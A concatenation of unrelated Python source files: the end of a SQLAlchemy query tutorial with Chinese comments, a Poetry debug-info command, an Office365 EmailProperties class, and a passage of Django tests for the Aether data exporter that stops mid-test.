# birth_date='1993-6-13', email='wy@163.com', dep_id=3
# )
# session.add_all([lb, gy, zf, zy, hz, wy])
#######################################
# 查询时,将类作为参数,返回的是实例集合
# qset1 = session.query(Departments)
# print(qset1) # qset1是SQL语句,取值时sql语句才会执行,返回结果
# for dep in qset1:
# print(dep.dep_id, dep.dep_name)
#######################################
# 查询时,将类变量作为参数,返回的是元组构成的查询集
# qset2 = session.query(Departments.dep_id, Departments.dep_name)
# for dep in qset2:
# print(dep)
#######################################
# 排序
# qset3 = session.query(Departments).order_by(Departments.dep_id)
# for dep in qset3:
# print(dep.dep_id, dep.dep_name)
# print('*' * 30)
#
# for dep in qset3[2:5]:
# print(dep.dep_id, dep.dep_name)
#######################################
# 过滤
# qset4 = session.query(Departments).filter(Departments.dep_id>=3)
# for dep in qset4:
# print(dep.dep_id, dep.dep_name)
#
# print('*' * 30)
#
# qset5 = session.query(Departments).filter(Departments.dep_id>=3)\
# .filter(Departments.dep_id<6)
# for dep in qset5:
# print(dep.dep_id, dep.dep_name)
#######################################
# qset6 = session.query(Employees).filter(Employees.email.like('%@qq.com'))
# for emp in qset6:
# print(emp.emp_name, emp.email)
#######################################
# qset7 = session.query(Departments).filter(Departments.dep_id.in_([1, 3]))
# for dep in qset7:
# print(dep.dep_id, dep.dep_name)
#######################################
# qset8 = session.query(Departments.dep_id, Departments.dep_name)
# print(qset8) # qset8是SQL语句
# print(qset8.all()) # all方法返回列表
# print(qset8.first()) # first返回all中的第一项
#######################################
# qset9 = session.query(Departments.dep_id, Departments.dep_name)\
# .filter(Departments.dep_id==20)
# # one方法要求查询的结果只有一项,0或多项都报错
# print(qset9.one())
#######################################
# 多表查询,默认情况下sqlalchemy会自动根据主外键约束找到对应关系
# 查询的时候参数先写Employees,join要写Departments,反之亦然
# qset10 = session.query(Employees.emp_name, Departments.dep_name)\
# .join(Departments)
# print(qset10.all())
#######################################
# 修改,只要将实例重新赋值
# qset11 = session.query(Departments).filter(Departments.dep_name=='人事部')
# hr = qset11.one()
# hr.dep_name = '人力资源部'
#######################################
# 删除,先找到实例再删除
qset12 = session.query(Departments).filter(Departments.dep_id==6)
sales = qset12.one()
session.delete(sales)
#######################################
session.commit() # 确认
session.close() # 关闭会诂连接
|
import sys
from clikit.args import StringArgs
from ..command import Command
class DebugInfoCommand(Command):
name = "info"
description = "Shows debug information."
def handle(self):
poetry_python_version = ".".join(str(s) for s in sys.version_info[:3])
self.line("")
self.line("<b>Poetry</b>")
self.line(
"\n".join(
[
"<info>Version</info>: <comment>{}</>".format(self.poetry.VERSION),
"<info>Python</info>: <comment>{}</>".format(
poetry_python_version
),
]
)
)
args = StringArgs("")
command = self.application.get_command("env").get_sub_command("info")
return command.run(args, self._io)
|
from office365.runtime.client_value import ClientValue
from office365.runtime.client_value_collection import ClientValueCollection
class EmailProperties(ClientValue):
def __init__(self, body, subject, to, from_address=None, cc=None, bcc=None, additional_headers=None):
"""
:param str body:
:param str subject:
:param list[str] to:
:param str or None from_address:
:param list[str] or None cc:
:param list[str] or None bcc:
:param dict or None additional_headers:
"""
super(EmailProperties, self).__init__()
self.Body = body
self.Subject = subject
self.From = from_address
self.To = ClientValueCollection(str, to)
self.CC = ClientValueCollection(str, cc)
self.BCC = ClientValueCollection(str, bcc)
self.AdditionalHeaders = additional_headers
@property
def entity_type_name(self):
return "SP.Utilities.EmailProperties"
|
# Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
from unittest import mock
import os
import requests
import tempfile
import zipfile
from copy import deepcopy
from random import shuffle
from openpyxl import load_workbook
from django.contrib.auth import get_user_model
from django.core.files.uploadedfile import SimpleUploadedFile
from django.db import connection
from django.db.models import F
from django.test import TransactionTestCase, TestCase, override_settings, tag
from django.urls import reverse
from aether.kernel.api import models
from aether.kernel.api.entity_extractor import run_extraction
from aether.kernel.api.project_artefacts import upsert_project_with_avro_schemas
from aether.kernel.api.utils import safe_sleep
from aether.kernel.api.exporter import (
__filter_paths as filter_paths,
__filter_headers as filter_headers,
__order_headers as order_headers,
__flatten_dict as flatten_dict,
__get_label as get_label,
__generate_csv_files as gen_csv_files,
__prepare_xlsx as gen_xlsx,
__prepare_zip as gen_zip,
execute_records_task,
execute_attachments_task,
CSV_FORMAT,
XLSX_FORMAT,
MAX_SIZE,
DEFAULT_OPTIONS,
)
here = os.path.dirname(os.path.realpath(__file__))
EXAMPLE_PATHS = [
'country',
'region',
'name',
'location',
'location.latitude',
'location.longitude',
'location.altitude',
'location.accuracy',
'location_none',
'location_none.latitude',
'location_none.longitude',
'location_none.altitude',
'location_none.accuracy',
'image',
'number',
'number2',
'date',
'datetime',
'option',
'option_a',
'option_a.choice_a',
'option_b',
'option_b.choice_b',
'lang',
'lang.#',
'iterate',
'iterate.#',
'iterate.#.index',
'iterate.#.value',
'iterate_one',
'iterate_one.#',
'iterate_one.#.item',
'iterate_none',
'iterate_none.#',
'iterate_none.#.nothing',
'id',
]
EXAMPLE_LABELS = {
'_id': 'xForm ID',
'_version': 'xForm version',
'country': 'Country',
'region': 'Region',
'name': 'What is your name?',
'location': 'Collect your GPS coordinates',
'location.latitude': 'latitude',
'location.longitude': 'longitude',
'location.altitude': 'altitude',
'location.accuracy': 'accuracy',
'location_none': 'Ignore your GPS coordinates',
'location_none.latitude': 'latitude',
'location_none.longitude': 'longitude',
'location_none.altitude': 'altitude',
'location_none.accuracy': 'accuracy',
'image': 'Take a picture',
'number': 'How many?',
'number2': 'Percentage',
'date': 'When?',
'datetime': 'At?',
'option': 'Choice (A/B)',
'option_a': 'Option A',
'option_a.choice_a': 'Choice A',
'option_b': 'Option B',
'option_b.choice_b': 'Choice B',
'lang': 'Spoken languages',
'iterate': 'Indicate loop elements',
'iterate.#.index': 'Index',
'iterate.#.value': 'Value',
'iterate_one': 'Indicate one',
'iterate_one.#.item': 'Item',
'iterate_none': 'Indicate none',
'iterate_none.#.nothing': 'None',
'id': 'ID',
}
def helper__generate_file(
temp_dir,
data,
paths=[],
labels={},
file_format=CSV_FORMAT,
filename='export',
offset=0,
limit=MAX_SIZE,
options=DEFAULT_OPTIONS,
):
'''
Generates an XLSX/ZIP (of CSV files) file with the given data.
- ``data`` a queryset with two main properties ``EXPORT_FIELD_ID``
and ``EXPORT_FIELD_DATA``.
- ``paths`` is a list with the allowed jsonpaths.
- ``labels`` is a dictionary whose keys are the jsonpaths
and the values the linked labels to use as header for that jsonpath.
- ``file_format``, expected values ``xlsx`` or ``csv``.
- ``options`` the export options.
'''
sql, params = data.query.sql_with_params()
with connection.cursor() as cursor:
sql_sentence = cursor.mogrify(sql, params).decode('utf-8')
csv_files = gen_csv_files(temp_dir,
sql_sentence,
paths,
labels,
offset,
limit,
options,
)
if file_format == XLSX_FORMAT:
return gen_xlsx(temp_dir, csv_files, filename)
else:
return gen_zip(temp_dir, csv_files, filename)
class ExporterTest(TestCase):
def test__flatten_dict(self):
item = {
'a': {
'b': 1,
'z': 'z',
},
'c': {
'd': [{'f': 2}],
},
'e': [1, 2, 3],
}
expected = {
'a.b': 1,
'a.z': 'z',
'c.d': [{'f': 2}],
'e': [1, 2, 3],
}
expected_flatten = {
'a.b': 1,
'a.z': 'z',
'c.d.1.f': 2,
'e.1': 1,
'e.2': 2,
'e.3': 3,
}
self.assertEqual(flatten_dict({}), {})
self.assertEqual(flatten_dict(item), expected)
self.assertEqual(flatten_dict(item, flatten_list=True), expected_flatten)
self.assertEqual(flatten_dict(flatten_dict(item)), expected) # idempotent
def test__filter_paths(self):
paths = [
'a',
'a.b',
'a.b.*',
'a.b.*.#',
'a.b.*.#.x',
'a.c',
'a.c.#',
'a.c.#.y',
'a.d',
'a.d.?',
'a.d.?.e',
'a.f',
'a.f.g',
'z',
]
expected = [
'a.b',
'a.c',
'a.d',
'a.f.g',
'z',
]
self.assertEqual(filter_paths(paths), expected)
self.assertEqual(filter_paths(filter_paths(paths)), expected)
def test__filter_headers(self):
prefix = ['@', '@id']
headers = ['a', 'x', 'z', 'c', 'd']
# nothing changes
self.assertEqual(filter_headers([], '$', headers), headers)
# includes prefix, filters and orders the headers
self.assertEqual(filter_headers(['a', 'w', 'd', 'z'], '$', headers), prefix + ['a', 'd', 'z'])
def test__filter_headers__list(self):
paths = ['b', 'a'] # not in alphabetical order
prefix = ['@', '@id']
expected = [
'b.1', 'b.2', 'b.3', 'b.4', 'b.5',
'a.1', 'a.2', 'a.3', 'a.4', 'a.5',
]
headers = deepcopy(expected)
for _ in range(5):
shuffle(headers) # change the order of the elements
self.assertNotEqual(headers, expected)
self.assertEqual(filter_headers(paths, '$', headers), prefix + expected)
def test__filter_headers__nested_list(self):
paths = ['b', 'a'] # not in alphabetical order
prefix = ['@', '@id']
expected = [
'b.1.1', 'b.1.2', 'b.1.3', 'b.1.4', 'b.1.5', 'b.2.1',
'a.1.1', 'a.1.2', 'a.1.3', 'a.2.1', 'a.2.2', 'a.3.1',
]
headers = deepcopy(expected)
for _ in range(5):
shuffle(headers) # change the order of the elements
self.assertNotEqual(headers, expected)
self.assertEqual(filter_headers(paths, '$', headers), prefix + expected)
def test__order_headers__documented_case(self):
headers = [
'ZZZ',
'w.2.b.1',
'w.1.a.1',
'w.2.a',
'XXX',
'b.2',
'w.3',
'w.2.b.2',
'YYY',
'c.1',
'w.1.c.1',
'w.1.c.2',
'c.2',
'b.4',
]
expected = [
'ZZZ',
'w.1.a.1',
'w.1.c.1',
'w.1.c.2',
'w.2.b.1',
'w.2.b.2',
'w.2.a',
'w.3',
'XXX',
'b.2',
'b.4',
'YYY',
'c.1',
'c.2',
]
self.assertEqual(order_headers(headers), expected)
def test__get_label(self):
labels = {
'a': 'Root',
'a.d.#.e': 'The indexed E',
'a.*.c': 'The Big C',
'a.*.c.?.u': 'Join',
'x.y.?.z': 'Union'
}
# should find simple nested properties
self.assertEqual(get_label('a', labels), 'Root')
self.assertEqual(get_label('@.a', labels), 'Root')
self.assertEqual(get_label('@.a', content='path'), 'a')
self.assertEqual(get_label('a.b'), 'A / B')
self.assertEqual(get_label('a.b', single=True), 'B')
self.assertEqual(get_label('a.b', content='path', single=True), 'b')
self.assertEqual(get_label('a.b', content='path', joiner=':'), 'a:b')
# should detect array properties
self.assertEqual(get_label('a.d.#.e', labels), 'Root / D / # / The indexed E')
self.assertEqual(get_label('a.d.#.e', labels, single=True), 'The indexed E')
self.assertEqual(get_label('a.d.#.e', labels, joiner=' : '), 'Root : D : # : The indexed E')
# should detect map properties
self.assertEqual(get_label('a.x.c', labels), 'Root / X / The Big C')
self.assertEqual(get_label('a.x_x.c', labels), 'Root / X x / The Big C')
self.assertEqual(get_label('a.x__1_x.c', labels), 'Root / X 1 x / The Big C')
self.assertEqual(get_label('a.x__1._x.c', labels), 'Root / X 1 / X / C')
self.assertEqual(get_label('a.x.c.z', labels), 'Root / X / The Big C / Z')
self.assertEqual(get_label('a.x_x.c.z', labels), 'Root / X x / The Big C / Z')
self.assertEqual(get_label('a.x__1_x.c.z', labels), 'Root / X 1 x / The Big C / Z')
self.assertEqual(get_label('a.x__1_x.c.z', labels, joiner=' - '), 'Root - X 1 x - The Big C - Z')
# should detect union properties
self.assertEqual(get_label('a.x.c.u', labels), 'Root / X / The Big C / Join')
self.assertEqual(get_label('a.x_x.c.u', labels), 'Root / X x / The Big C / Join')
self.assertEqual(get_label('a.x__1_x.c.u', labels), 'Root / X 1 x / The Big C / Join')
self.assertEqual(get_label('a.x__1._x.c.u', labels), 'Root / X 1 / X / C / U')
self.assertEqual(get_label('x.y.z', labels), 'X / Y / Union')
self.assertEqual(get_label('x.y.a.z', labels), 'X / Y / A / Z')
def test__endpoints(self):
self.assertEqual(reverse('submission-xlsx'), '/submissions/xlsx/')
self.assertEqual(reverse('submission-csv'), '/submissions/csv/')
self.assertEqual(reverse('entity-xlsx'), '/entities/xlsx/')
self.assertEqual(reverse('entity-csv'), '/entities/csv/')
@tag('nonparallel')
@override_settings(MULTITENANCY=False)
class ExporterViewsTest(TransactionTestCase):
def setUp(self):
super(ExporterViewsTest, self).setUp()
username = 'test'
email = 'test@example.com'
password = 'testtest'
self.user = get_user_model().objects.create_user(username, email, password)
self.assertTrue(self.client.login(username=username, password=password))
with open(os.path.join(here, 'files/export.avsc'), 'rb') as in_file:
self.EXAMPLE_SCHEMA = json.load(in_file)
with open(os.path.join(here, 'files/export.json'), 'rb') as in_file:
self.EXAMPLE_PAYLOAD = json.load(in_file)
self.helper__create_project(1)
self.assertEqual(models.Project.objects.count(), 1)
self.assertEqual(models.Submission.objects.count(), 1)
self.assertEqual(models.Entity.objects.count(), 1)
self.assertEqual(models.ExportTask.objects.count(), 0)
def tearDown(self):
self.client.logout()
super(ExporterViewsTest, self).tearDown()
def helper__create_project(self, index):
project = models.Project.objects.create(
name=f'project_{index}',
)
# create artifacts for the AVRO schema
artifacts_id = str(project.pk)
upsert_project_with_avro_schemas(
project_id=artifacts_id,
avro_schemas=[{
'id': artifacts_id,
'name': f'export_{index}',
'definition': self.EXAMPLE_SCHEMA,
}],
)
submission = models.Submission.objects.create(
payload=dict(self.EXAMPLE_PAYLOAD),
mappingset=models.MappingSet.objects.get(pk=artifacts_id),
)
# extract entities
run_extraction(submission)
# -----------------------------
# GENERATE FILES
# -----------------------------
def test__generate__csv(self):
kwargs = {
'labels': EXAMPLE_LABELS,
'file_format': CSV_FORMAT,
'offset': 0,
'limit': 1,
}
# without paths (includes: ``aether_extractor_enrichment``)
data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
with tempfile.TemporaryDirectory() as temp_dir:
_, zip_path = helper__generate_file(temp_dir, data, paths=[], **kwargs)
zip_file = zipfile.ZipFile(zip_path, 'r')
self.assertEqual(zip_file.namelist(),
['export.csv', 'export.1.csv', 'export.2.csv', 'export.3.csv', 'export.4.csv'])
# with the whole paths list (there are 3 arrays with data, ``iterate_none`` is empty)
data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
with tempfile.TemporaryDirectory() as temp_dir:
_, zip_path = helper__generate_file(temp_dir, data, paths=EXAMPLE_PATHS, **kwargs)
zip_file = zipfile.ZipFile(zip_path, 'r')
self.assertEqual(zip_file.namelist(),
['export.csv', 'export.1.csv', 'export.2.csv', 'export.3.csv'])
# without `iterate_one` in paths
paths = [path for path in EXAMPLE_PATHS if not path.startswith('iterate_one')]
with tempfile.TemporaryDirectory() as temp_dir:
_, zip_path = helper__generate_file(temp_dir, data, paths=paths, **kwargs)
zip_file = zipfile.ZipFile(zip_path, 'r')
self.assertEqual(zip_file.namelist(),
['export.csv', 'export.1.csv', 'export.2.csv'])
# with `flatten` option should generate only one file
with tempfile.TemporaryDirectory() as temp_dir:
_, zip_path = helper__generate_file(
temp_dir,
data,
paths=[],
options={
'header_content': 'paths',
'header_separator': '*',
'header_shorten': 'no',
'data_format': 'flatten',
},
**kwargs,
)
zip_file = zipfile.ZipFile(zip_path, 'r')
self.assertEqual(zip_file.namelist(), ['export.csv'])
def test__generate__xlsx__split(self):
_id = str(models.Submission.objects.first().pk)
data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
with tempfile.TemporaryDirectory() as temp_dir:
_, xlsx_path = helper__generate_file(
temp_dir,
data,
paths=EXAMPLE_PATHS,
labels=EXAMPLE_LABELS,
file_format=XLSX_FORMAT,
offset=0,
limit=1,
options={
'header_content': 'both', # includes paths and labels
'header_separator': '—',
'header_shorten': 'no',
'data_format': 'split',
},
)
wb = load_workbook(filename=xlsx_path, read_only=True)
# check workbook content
ws = wb['0'] # root content
# check headers: paths
self.assertEqual(ws['A1'].value, '@')
self.assertEqual(ws['B1'].value, '@id')
self.assertEqual(ws['C1'].value, 'country')
self.assertEqual(ws['D1'].value, 'region')
self.assertEqual(ws['E1'].value, 'name')
self.assertEqual(ws['F1'].value, 'location—latitude')
self.assertEqual(ws['G1'].value, 'location—longitude')
self.assertEqual(ws['H1'].value, 'location—altitude')
self.assertEqual(ws['I1'].value, 'location—accuracy')
self.assertEqual(ws['J1'].value, 'image')
self.assertEqual(ws['K1'].value, 'number')
self.assertEqual(ws['L1'].value, 'number2')
self.assertEqual(ws['M1'].value, 'date')
self.assertEqual(ws['N1'].value, 'datetime')
self.assertEqual(ws['O1'].value, 'option')
self.assertEqual(ws['P1'].value, 'option_a—choice_a')
self.assertEqual(ws['Q1'].value, 'id')
# check headers: labels
self.assertEqual(ws['A2'].value, '@')
self.assertEqual(ws['B2'].value, '@id')
self.assertEqual(ws['C2'].value, 'Country')
self.assertEqual(ws['D2'].value, 'Region')
self.assertEqual(ws['E2'].value, 'What is your name?')
self.assertEqual(ws['F2'].value, 'Collect your GPS coordinates — latitude')
self.assertEqual(ws['G2'].value, 'Collect your GPS coordinates — longitude')
self.assertEqual(ws['H2'].value, 'Collect your GPS coordinates — altitude')
self.assertEqual(ws['I2'].value, 'Collect your GPS coordinates — accuracy')
self.assertEqual(ws['J2'].value, 'Take a picture')
self.assertEqual(ws['K2'].value, 'How many?')
self.assertEqual(ws['L2'].value, 'Percentage')
self.assertEqual(ws['M2'].value, 'When?')
self.assertEqual(ws['N2'].value, 'At?')
self.assertEqual(ws['O2'].value, 'Choice (A/B)')
self.assertEqual(ws['P2'].value, 'Option A — Choice A')
self.assertEqual(ws['Q2'].value, 'ID')
# check rows
self.assertEqual(ws['A3'].value, 1)
self.assertEqual(ws['B3'].value, _id)
self.assertEqual(ws['C3'].value, 'CM')
self.assertEqual(ws['D3'].value, None)
self.assertEqual(ws['E3'].value, 'Name')
self.assertEqual(ws['F3'].value, 52.52469543)
self.assertEqual(ws['G3'].value, 13.39282687)
self.assertEqual(ws['H3'].value, 108)
self.assertEqual(ws['I3'].value, 22)
self.assertEqual(ws['J3'].value, None)
self.assertEqual(ws['K3'].value, 3)
self.assertEqual(ws['L3'].value, 3.56)
self.assertEqual(ws['M3'].value, '2017-07-14T00:00:00')
self.assertEqual(ws['N3'].value, '2017-07-14T16:38:47.151000+02:00')
self.assertEqual(ws['O3'].value, 'a')
self.assertEqual(ws['P3'].value, 'A')
self.assertEqual(ws['Q3'].value, '6b90cfb6-0ee6-4035-94bc-fb7f3e56d790')
ws1 = wb['1'] # first array content
# check headers: paths
self.assertEqual(ws1['A1'].value, '@')
self.assertEqual(ws1['B1'].value, '@id')
self.assertEqual(ws1['C1'].value, 'lang—#')
self.assertEqual(ws1['D1'].value, 'lang—#—')
# check headers: labels
self.assertEqual(ws1['A2'].value, '@')
self.assertEqual(ws1['B2'].value, '@id')
self.assertEqual(ws1['C2'].value, 'Spoken languages — #')
self.assertEqual(ws1['D2'].value, 'Spoken languages — # — ')
# check rows
self.assertEqual(ws1['A3'].value, 1)
self.assertEqual(ws1['B3'].value, _id)
self.assertEqual(ws1['C3'].value, 1)
self.assertEqual(ws1['D3'].value, 'EN')
self.assertEqual(ws1['A4'].value, 1)
self.assertEqual(ws1['B4'].value, _id)
self.assertEqual(ws1['C4'].value, 2)
self.assertEqual(ws1['D4'].value, 'FR')
ws2 = wb['2'] # second array content
# check headers: paths
self.assertEqual(ws2['A1'].value, '@')
self.assertEqual(ws2['B1'].value, '@id')
self.assertEqual(ws2['C1'].value, 'iterate—#')
self.assertEqual(ws2['D1'].value, 'iterate—#—index')
self.assertEqual(ws2['E1'].value, 'iterate—#—value')
# check headers: labels
self.assertEqual(ws2['A2'].value, '@')
self.assertEqual(ws2['B2'].value, '@id')
self.assertEqual(ws2['C2'].value, 'Indicate loop elements — #')
self.assertEqual(ws2['D2'].value, 'Indicate loop elements — # — Index')
self.assertEqual(ws2['E2'].value, 'Indicate loop elements — # — Value')
# check rows
self.assertEqual(ws2['A3'].value, 1)
self.assertEqual(ws2['B3'].value, _id)
self.assertEqual(ws2['C3'].value, 1)
self.assertEqual(ws2['D3'].value, 1)
self.assertEqual(ws2['E3'].value, 'One')
self.assertEqual(ws2['A4'].value, 1)
self.assertEqual(ws2['B4'].value, _id)
self.assertEqual(ws2['C4'].value, 2)
self.assertEqual(ws2['D4'].value, 2)
self.assertEqual(ws2['E4'].value, 'Two')
self.assertEqual(ws2['A5'].value, 1)
self.assertEqual(ws2['B5'].value, _id)
self.assertEqual(ws2['C5'].value, 3)
self.assertEqual(ws2['D5'].value, 3)
self.assertEqual(ws2['E5'].value, 'Three')
ws3 = wb['3'] # third array content
# check headers: paths
self.assertEqual(ws3['A1'].value, '@')
self.assertEqual(ws3['B1'].value, '@id')
self.assertEqual(ws3['C1'].value, 'iterate_one—#')
self.assertEqual(ws3['D1'].value, 'iterate_one—#—item')
# check headers: labels
self.assertEqual(ws3['A2'].value, '@')
self.assertEqual(ws3['B2'].value, '@id')
self.assertEqual(ws3['C2'].value, 'Indicate one — #')
self.assertEqual(ws3['D2'].value, 'Indicate one — # — Item')
# check rows
self.assertEqual(ws3['A3'].value, 1)
self.assertEqual(ws3['B3'].value, _id)
self.assertEqual(ws3['C3'].value, 1)
self.assertEqual(ws3['D3'].value, 'one')
def test__generate__xlsx__flatten(self):
_id = str(models.Submission.objects.first().pk)
data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
with tempfile.TemporaryDirectory() as temp_dir:
_, xlsx_path = helper__generate_file(
temp_dir,
data,
paths=EXAMPLE_PATHS,
labels=EXAMPLE_LABELS,
file_format=XLSX_FORMAT,
offset=0,
limit=1,
options={
'header_content': 'paths',
'header_separator': '—',
'header_shorten': 'no',
'data_format': 'flatten',
},
)
wb = load_workbook(filename=xlsx_path, read_only=True)
# check workbook content
ws = wb['0'] # root content
# check headers: paths
self.assertEqual(ws['A1'].value, '@')
self.assertEqual(ws['B1'].value, '@id')
self.assertEqual(ws['C1'].value, 'country')
self.assertEqual(ws['D1'].value, 'region')
self.assertEqual(ws['E1'].value, 'name')
self.assertEqual(ws['F1'].value, 'location—latitude')
self.assertEqual(ws['G1'].value, 'location—longitude')
self.assertEqual(ws['H1'].value, 'location—altitude')
self.assertEqual(ws['I1'].value, 'location—accuracy')
self.assertEqual(ws['J1'].value, 'image')
self.assertEqual(ws['K1'].value, 'number')
self.assertEqual(ws['L1'].value, 'number2')
self.assertEqual(ws['M1'].value, 'date')
self.assertEqual(ws['N1'].value, 'datetime')
self.assertEqual(ws['O1'].value, 'option')
self.assertEqual(ws['P1'].value, 'option_a—choice_a')
self.assertEqual(ws['Q1'].value, 'lang—1')
self.assertEqual(ws['R1'].value, 'lang—2')
self.assertEqual(ws['S1'].value, 'iterate—1—index')
self.assertEqual(ws['T1'].value, 'iterate—1—value')
self.assertEqual(ws['U1'].value, 'iterate—2—index')
self.assertEqual(ws['V1'].value, 'iterate—2—value')
self.assertEqual(ws['W1'].value, 'iterate—3—index')
self.assertEqual(ws['X1'].value, 'iterate—3—value')
self.assertEqual(ws['Y1'].value, 'iterate_one—1—item')
self.assertEqual(ws['Z1'].value, 'id')
# check rows
self.assertEqual(ws['A2'].value, 1)
self.assertEqual(ws['B2'].value, _id)
self.assertEqual(ws['C2'].value, 'CM')
self.assertEqual(ws['D2'].value, None)
self.assertEqual(ws['E2'].value, 'Name')
self.assertEqual(ws['F2'].value, 52.52469543)
self.assertEqual(ws['G2'].value, 13.39282687)
self.assertEqual(ws['H2'].value, 108)
self.assertEqual(ws['I2'].value, 22)
self.assertEqual(ws['J2'].value, None)
self.assertEqual(ws['K2'].value, 3)
self.assertEqual(ws['L2'].value, 3.56)
self.assertEqual(ws['M2'].value, '2017-07-14T00:00:00')
self.assertEqual(ws['N2'].value, '2017-07-14T16:38:47.151000+02:00')
self.assertEqual(ws['O2'].value, 'a')
self.assertEqual(ws['P2'].value, 'A')
self.assertEqual(ws['Q2'].value, 'EN')
self.assertEqual(ws['R2'].value, 'FR')
self.assertEqual(ws['S2'].value, 1)
self.assertEqual(ws['T2'].value, 'One')
self.assertEqual(ws['U2'].value, 2)
self.assertEqual(ws['V2'].value, 'Two')
self.assertEqual(ws['W2'].value, 3)
self.assertEqual(ws['X2'].value, 'Three')
self.assertEqual(ws['Y2'].value, 'one')
self.assertEqual(ws['Z2'].value, '6b90cfb6-0ee6-4035-94bc-fb7f3e56d790')
@mock.patch('aether.kernel.api.exporter.RECORDS_PAGE_SIZE', 1)
def test__generate__xlsx__paginate(self):
submission_1 = models.Submission.objects.first()
submission_2 = models.Submission.objects.create(
payload=dict(self.EXAMPLE_PAYLOAD),
mappingset=submission_1.mappingset,
)
submission_3 = models.Submission.objects.create(
payload=dict(self.EXAMPLE_PAYLOAD),
mappingset=submission_1.mappingset,
)
data = models.Submission.objects.annotate(exporter_data=F('payload')).values('id', 'exporter_data')
with tempfile.TemporaryDirectory() as temp_dir:
_, xlsx_path = helper__generate_file(
temp_dir,
data,
paths=EXAMPLE_PATHS,
labels=EXAMPLE_LABELS,
file_format=XLSX_FORMAT,
offset=0,
limit=2,
options={
'header_content': 'paths',
'header_separator': '*',
'header_shorten': '—',
'data_format': 'flatten',
},
)
wb = load_workbook(filename=xlsx_path, read_only=True)
# check workbook content
ws = wb['0'] # root content
# check headers: paths
self.assertEqual(ws['A1'].value, '@')
self.assertEqual(ws['B1'].value, '@id')
# check entries (ordered by `modified` DESC)
self.assertEqual(ws['A2'].value, 1)
self.assertEqual(ws['B2'].value, str(submission_3.pk))
self.assertEqual(ws['A3'].value, 2)
self.assertEqual(ws['B3'].value, str(submission_2.pk))
self.assertIsNone(ws['A4'].value) # limit is 2
# -----------------------------
# VIEWS
# -----------------------------
def test__exporttask_view(self):
task = models.ExportTask.objects.create(
name='test',
project=models.Project.objects.first(),
)
task_file = models.ExportTaskFile.objects.create(
task=task,
file=SimpleUploadedFile('a.txt', b'123')
)
task_url = reverse('exporttask-detail', kwargs={'pk': task.pk})
response = self.client.get(task_url)
self.assertEqual(response.status_code, 200)
data = response.json()
self.assertEqual(data['name'], 'test')
self.assertEqual(len(data['files']), 1)
self.assertEqual(data['files'][0]['md5sum'], task_file.md5sum)
self.assertEqual(
data['files'][0]['file_url'],
f'http://testserver/export-tasks/{task.pk}/file-content/{task_file.pk}/')
task_file_content = self.client.get(data['files'][0]['file_url'])
self.assertEqual(task_file_content.getvalue(), b'123')
task.delete()
response = self.client.get(task_url)
self.assertEqual(response.status_code, 404)
def test__view(self):
response = self.client.post(reverse('submission-csv'))
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.project.name, 'project_1')
self.assertEqual(task.status_records, 'DONE')
self.assertIsNone(task.error_records)
self.assertIsNone(task.status_attachments)
def test__empty(self):
url = reverse('submission-xlsx')
response = self.client.get(f'{url}?start_at=1')
self.assertEqual(response.status_code, 200)
response = self.client.get(f'{url}?start_at=2')
self.assertEqual(response.status_code, 204)
response = self.client.get(f'{url}?page=1')
self.assertEqual(response.status_code, 200)
response = self.client.get(f'{url}?page=2')
self.assertEqual(response.status_code, 204)
response = self.client.post(f'{url}?project=unknown')
self.assertEqual(response.status_code, 204)
def test__more_than_one_project(self):
# create at least 2 more projects
for i in range(2):
self.helper__create_project(i + 2)
self.assertEqual(models.Project.objects.count(), 3)
self.assertEqual(models.Submission.objects.count(), 3)
self.assertEqual(models.Entity.objects.count(), 3)
url = reverse('submission-xlsx')
response = self.client.post(url)
self.assertEqual(response.status_code, 400)
response = self.client.post(f'{url}?project=project_1')
self.assertEqual(response.status_code, 200)
response = self.client.post(f'{url}?project=project_2')
self.assertEqual(response.status_code, 200)
# -----------------------------
# ERROR HANDLING
# -----------------------------
def test__error__deleted_task(self):
def my_side_effect(task_id):
# let's remove the task and execute the real method
models.ExportTask.objects.filter(pk=task_id).delete()
execute_records_task(task_id)
with mock.patch(
'aether.kernel.api.exporter.execute_records_task',
side_effect=my_side_effect,
):
response = self.client.get(reverse('submission-xlsx'))
self.assertEqual(response.status_code, 200)
self.assertEqual(models.ExportTask.objects.count(), 0)
task_id = response.json()['task']
self.assertFalse(models.ExportTask.objects.filter(pk=task_id).exists())
@mock.patch(
'aether.kernel.api.exporter.__prepare_xlsx',
side_effect=OSError('[Errno 2] No such file or directory'),
)
def test__xlsx__error(self, *args):
response = self.client.get(reverse('submission-xlsx'))
self.assertEqual(response.status_code, 200)
task_id = response.json()['task']
task = models.ExportTask.objects.get(pk=task_id)
self.assertEqual(task.created_by.username, 'test')
self.assertEqual(task.project.name, 'project_1')
self.assertEqual(task.status_records, 'ERROR')
self.assertEqual(task.error_records, '[Errno 2] No such file or directory')
self.assertEqual(task.files.count(), 0)
self.assertEqual(task.settings['offset'], 0)
self.assertEqual(task.settings['limit'], 1)
self.assertEqual(task.settings['records']['file_format'], 'xlsx')
self.assertEqual(task.settings['records']['filename'], 'project_1-export')
self.assertEqual(
task.settings['records']['export_options'],
{
'header_content': 'labels',
'header_separator': '/',
'header_shorten': 'no',
'data_format': 'split',
})
@mock.patch(
'aether.kernel.api.exporter.__generate_csv_files',
side_effect=OSError('[Errno 2] No such file or directory'),
)
def test__csv__error(self, *args):
for i in range(13):
models.Submission.objects.create(
payload=dict({'name': f'Person-{i}'}),
mappingset=models.MappingSet.objects.first(),
)
response = self.client.post(
reverse('submission-csv'),
data=json.dumps({
'paths': ['_id', '_rev'],
'labels': {'_id': 'id', '_rev': 'rev'},
'filename': 'submissions',
'page': 3,
'page_size': 5,
